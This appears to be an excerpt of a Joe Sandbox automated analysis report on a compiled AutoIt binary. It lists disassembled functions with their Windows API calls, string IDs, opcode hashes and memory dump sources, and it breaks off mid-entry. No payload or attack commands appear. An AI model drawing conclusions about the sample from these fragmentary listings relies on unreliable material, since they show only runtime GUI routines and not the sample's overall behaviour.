                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 1996641542-0
                                                                            • Opcode ID: fa548eeb02b22a5ff23711ae61f58dda3d8da77ac4c7850977b6bb497cc11087
                                                                            • Instruction ID: 69e9e9da768e8a1410f049a82d1915d89fa2293f5bdb211c0177e05359d08ba3
                                                                            • Opcode Fuzzy Hash: fa548eeb02b22a5ff23711ae61f58dda3d8da77ac4c7850977b6bb497cc11087
                                                                            • Instruction Fuzzy Hash: 6E512E75901218EFDB119FA8DC48EAE7B79FF08320F114626FA11EB2A2D7759940DF50
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 008849CA
                                                                            • GetDesktopWindow.USER32 ref: 008849DF
                                                                            • GetWindowRect.USER32(00000000), ref: 008849E6
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00884A48
                                                                            • DestroyWindow.USER32(?), ref: 00884A74
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00884A9D
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00884ABB
                                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00884AE1
                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00884AF6
                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00884B09
                                                                            • IsWindowVisible.USER32(?), ref: 00884B29
                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00884B44
                                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00884B58
                                                                            • GetWindowRect.USER32(?,?), ref: 00884B70
                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00884B96
                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00884BB0
                                                                            • CopyRect.USER32(?,?), ref: 00884BC7
                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00884C32
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                            • String ID: ($0$tooltips_class32
                                                                            • API String ID: 698492251-4156429822
                                                                            • Opcode ID: aa10892e476575e8d0287f2a3cdfef7a16e189d915e374387b61fe0e1188a134
                                                                            • Instruction ID: 6483b6cf7c3bebc3dc8c99327acda86cf556ee9d2a5ffefd030773312bcd0766
                                                                            • Opcode Fuzzy Hash: aa10892e476575e8d0287f2a3cdfef7a16e189d915e374387b61fe0e1188a134
                                                                            • Instruction Fuzzy Hash: 88B17B72604351AFDB44EF68C845B6ABBE4FF88314F008A1CF599DB2A2D771E805CB56
                                                                            APIs
                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 008644AC
                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 008644D2
                                                                            • _wcscpy.LIBCMT ref: 00864500
                                                                            • _wcscmp.LIBCMT ref: 0086450B
                                                                            • _wcscat.LIBCMT ref: 00864521
                                                                            • _wcsstr.LIBCMT ref: 0086452C
                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00864548
                                                                            • _wcscat.LIBCMT ref: 00864591
                                                                            • _wcscat.LIBCMT ref: 00864598
                                                                            • _wcsncpy.LIBCMT ref: 008645C3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                            • API String ID: 699586101-1459072770
                                                                            • Opcode ID: 1d4852078fbcdb87263af65aa17f67c9feafee836509df17cbb63b6600a7b58d
                                                                            • Instruction ID: 1e2636e551779627ba7d69f8f6ee9091ef460183acd70b83590449fd2274bd63
                                                                            • Opcode Fuzzy Hash: 1d4852078fbcdb87263af65aa17f67c9feafee836509df17cbb63b6600a7b58d
                                                                            • Instruction Fuzzy Hash: 7E41F9715002247BE715BA78DC47EBF776CFF52710F000066FA05E6283EA74998197A6
                                                                            APIs
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008028BC
                                                                            • GetSystemMetrics.USER32(00000007), ref: 008028C4
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008028EF
                                                                            • GetSystemMetrics.USER32(00000008), ref: 008028F7
                                                                            • GetSystemMetrics.USER32(00000004), ref: 0080291C
                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00802939
                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00802949
                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0080297C
                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00802990
                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 008029AE
                                                                            • GetStockObject.GDI32(00000011), ref: 008029CA
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 008029D5
                                                                              • Part of subcall function 00802344: GetCursorPos.USER32(?), ref: 00802357
                                                                              • Part of subcall function 00802344: ScreenToClient.USER32(008C57B0,?), ref: 00802374
                                                                              • Part of subcall function 00802344: GetAsyncKeyState.USER32(00000001), ref: 00802399
                                                                              • Part of subcall function 00802344: GetAsyncKeyState.USER32(00000002), ref: 008023A7
                                                                            • SetTimer.USER32(00000000,00000000,00000028,00801256), ref: 008029FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                            • String ID: AutoIt v3 GUI
                                                                            • API String ID: 1458621304-248962490
                                                                            • Opcode ID: 5c469b995e6b926ee60d9923bd0a9c917afdb9aff3a52f9b70b2d0f1890e4d95
                                                                            • Instruction ID: d08672f8948900efd2ba076a23b9a39050514dc9c53a7e60640e02e74ff54de7
                                                                            • Opcode Fuzzy Hash: 5c469b995e6b926ee60d9923bd0a9c917afdb9aff3a52f9b70b2d0f1890e4d95
                                                                            • Instruction Fuzzy Hash: 5BB14A75A0060AEFDB54DFA8DC49BAE7BB4FB48314F104229FA15E62E0DB74A850CB50
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0085A47A
                                                                            • __swprintf.LIBCMT ref: 0085A51B
                                                                            • _wcscmp.LIBCMT ref: 0085A52E
                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0085A583
                                                                            • _wcscmp.LIBCMT ref: 0085A5BF
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0085A5F6
                                                                            • GetDlgCtrlID.USER32(?), ref: 0085A648
                                                                            • GetWindowRect.USER32(?,?), ref: 0085A67E
                                                                            • GetParent.USER32(?), ref: 0085A69C
                                                                            • ScreenToClient.USER32(00000000), ref: 0085A6A3
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0085A71D
                                                                            • _wcscmp.LIBCMT ref: 0085A731
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0085A757
                                                                            • _wcscmp.LIBCMT ref: 0085A76B
                                                                              • Part of subcall function 0082362C: _iswctype.LIBCMT ref: 00823634
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                            • String ID: %s%u
                                                                            • API String ID: 3744389584-679674701
                                                                            • Opcode ID: 20079e1f4b3a7bce0919074153f6165103092f178cbedf099976d8a916e83511
                                                                            • Instruction ID: 5f59669db69890bfcb92bea9f6d9fb15813f8ae852bb8feb68a4d4efe0ddc1a6
                                                                            • Opcode Fuzzy Hash: 20079e1f4b3a7bce0919074153f6165103092f178cbedf099976d8a916e83511
                                                                            • Instruction Fuzzy Hash: BBA1D371204206AFDB18DF64C8C4FAAB7E8FF58316F044629FD99D2191DB30E959CB92
                                                                            APIs
                                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 0085AF18
                                                                            • _wcscmp.LIBCMT ref: 0085AF29
                                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 0085AF51
                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 0085AF6E
                                                                            • _wcscmp.LIBCMT ref: 0085AF8C
                                                                            • _wcsstr.LIBCMT ref: 0085AF9D
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0085AFD5
                                                                            • _wcscmp.LIBCMT ref: 0085AFE5
                                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 0085B00C
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0085B055
                                                                            • _wcscmp.LIBCMT ref: 0085B065
                                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 0085B08D
                                                                            • GetWindowRect.USER32(00000004,?), ref: 0085B0F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                            • String ID: @$ThumbnailClass
                                                                            • API String ID: 1788623398-1539354611
                                                                            • Opcode ID: 681fff8a3f569fc35a79ec4d7a67aac6a1c6e508cd83789c268edaeef43eb469
                                                                            • Instruction ID: 762efbc9185265b5467c7ecaa93f36708dca4435f189af600eedc02ab1d8605d
                                                                            • Opcode Fuzzy Hash: 681fff8a3f569fc35a79ec4d7a67aac6a1c6e508cd83789c268edaeef43eb469
                                                                            • Instruction Fuzzy Hash: 0F81AF711082099FDB05DF14C891BAA7BE8FF64316F14856AFD85CA092DB34DD8DCBA2
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0088A259
                                                                            • DestroyWindow.USER32(?,?), ref: 0088A2D3
                                                                              • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0088A34D
                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0088A36F
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0088A382
                                                                            • DestroyWindow.USER32(00000000), ref: 0088A3A4
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00800000,00000000), ref: 0088A3DB
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0088A3F4
                                                                            • GetDesktopWindow.USER32 ref: 0088A40D
                                                                            • GetWindowRect.USER32(00000000), ref: 0088A414
                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0088A42C
                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0088A444
                                                                              • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                            • String ID: S$0$tooltips_class32
                                                                            • API String ID: 1297703922-78703180
                                                                            • Opcode ID: 949e23ba17ed6d92d001fc079a23e2c4b2d090435f941c647d4bcd62dff62052
                                                                            • Instruction ID: 85d91202863415961a17800140d092b9033f5d8d3d7aeef20e78810c0a6777e2
                                                                            • Opcode Fuzzy Hash: 949e23ba17ed6d92d001fc079a23e2c4b2d090435f941c647d4bcd62dff62052
                                                                            • Instruction Fuzzy Hash: 3471AB70181205AFEB25DF28CC48F6A7BE5FB88704F04452EFA85C72A1D7B4E946CB56
                                                                            APIs
                                                                              • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                                            • DragQueryPoint.SHELL32(?,?), ref: 0088C627
                                                                              • Part of subcall function 0088AB37: ClientToScreen.USER32(?,?), ref: 0088AB60
                                                                              • Part of subcall function 0088AB37: GetWindowRect.USER32(?,?), ref: 0088ABD6
                                                                              • Part of subcall function 0088AB37: PtInRect.USER32(?,?,0088C014), ref: 0088ABE6
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0088C690
                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0088C69B
                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0088C6BE
                                                                            • _wcscat.LIBCMT ref: 0088C6EE
                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0088C705
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0088C71E
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0088C735
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0088C757
                                                                            • DragFinish.SHELL32(?), ref: 0088C75E
                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0088C851
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                            • String ID: S$@GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                            • API String ID: 169749273-1565791370
                                                                            • Opcode ID: a5475f7cf6d70c1de237f624fee0ec33af4d5f23223d48de6e488611a275ba34
                                                                            • Instruction ID: 98ee8ffa1e80363d811b4eaf5a4114556deac2829383b18b23ce05847c3b4191
                                                                            • Opcode Fuzzy Hash: a5475f7cf6d70c1de237f624fee0ec33af4d5f23223d48de6e488611a275ba34
                                                                            • Instruction Fuzzy Hash: 0B614D71108305AFC701EF68DC85D9BBBE8FF99710F10092EF695D22A1DB70A949CB62
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                            • API String ID: 1038674560-1810252412
                                                                            • Opcode ID: 05e7d533fdedcdd7bd1c562b09e5ef8cfa99daace64f889712f4daa85f417ade
                                                                            • Instruction ID: 38221812aec68d045c01148f71e7176f53a51ff5d99ce45a5f6a16ad26650880
                                                                            • Opcode Fuzzy Hash: 05e7d533fdedcdd7bd1c562b09e5ef8cfa99daace64f889712f4daa85f417ade
                                                                            • Instruction Fuzzy Hash: DB31B031948319AADB58FA68ED93EEE7764FF10711F600528F812F12D1EB656F088653
                                                                            APIs
                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00875013
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0087501E
                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00875029
                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00875034
                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 0087503F
                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 0087504A
                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00875055
                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00875060
                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 0087506B
                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00875076
                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00875081
                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 0087508C
                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00875097
                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 008750A2
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 008750AD
                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 008750B8
                                                                            • GetCursorInfo.USER32(?), ref: 008750C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load$Info
                                                                            • String ID:
                                                                            • API String ID: 2577412497-0
                                                                            • Opcode ID: 1c49d96d8dfe0574f075f1f529088c1278057ac2f4c305b1f5dbe0deb1bb4c7b
                                                                            • Instruction ID: 40e3443878cb3b846d6bdc1405e741317295f8937d2bb12f17ee2613ef9ea7e6
                                                                            • Opcode Fuzzy Hash: 1c49d96d8dfe0574f075f1f529088c1278057ac2f4c305b1f5dbe0deb1bb4c7b
                                                                            • Instruction Fuzzy Hash: 9D3112B1D0831DAADF509FB68C8996EBFE8FF04750F50453AE50DE7281DA78A5008FA1
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00884424
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0088446F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharMessageSendUpper
                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                            • API String ID: 3974292440-4258414348
                                                                            • Opcode ID: dcfed3056ae17ced95bfca243cb6bfd4532ffaad0309406b44cdf3dd06429d89
                                                                            • Instruction ID: 0e4f187bc7a51509e7b687fd1beaec5e61dcef4e4094791bea5b26ef6adf22d5
                                                                            • Opcode Fuzzy Hash: dcfed3056ae17ced95bfca243cb6bfd4532ffaad0309406b44cdf3dd06429d89
                                                                            • Instruction Fuzzy Hash: 6A915C712047129BCB04EF18C851A6EB7A1FF95354F548868F896DB3A3DB31ED49CB82
                                                                            APIs
                                                                              • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0088C1FC
                                                                            • GetFocus.USER32 ref: 0088C20C
                                                                            • GetDlgCtrlID.USER32(00000000), ref: 0088C217
                                                                            • _memset.LIBCMT ref: 0088C342
                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0088C36D
                                                                            • GetMenuItemCount.USER32(?), ref: 0088C38D
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 0088C3A0
                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0088C3D4
                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0088C41C
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0088C454
                                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0088C489
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                            • String ID: S$0
                                                                            • API String ID: 1296962147-770256432
                                                                            • Opcode ID: c727e1c0f31bed9bd95afe0d1cfb34c60764d219c1fe4a7f77611a1a0c9d9703
                                                                            • Instruction ID: 0356e01dd7b9210e479059e5ed2290877b53723e97e8b922bb7b11ab3731bcd8
                                                                            • Opcode Fuzzy Hash: c727e1c0f31bed9bd95afe0d1cfb34c60764d219c1fe4a7f77611a1a0c9d9703
                                                                            • Instruction Fuzzy Hash: 08816D70208311AFDB20EF18D894A7BBBE4FB88714F00492EFA95D7295D770D945CB62
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0088B8B4
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,008891C2), ref: 0088B910
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0088B949
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0088B98C
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0088B9C3
                                                                            • FreeLibrary.KERNEL32(?), ref: 0088B9CF
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0088B9DF
                                                                            • DestroyIcon.USER32(?,?,?,?,?,008891C2), ref: 0088B9EE
                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0088BA0B
                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0088BA17
                                                                              • Part of subcall function 00822EFD: __wcsicmp_l.LIBCMT ref: 00822F86
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
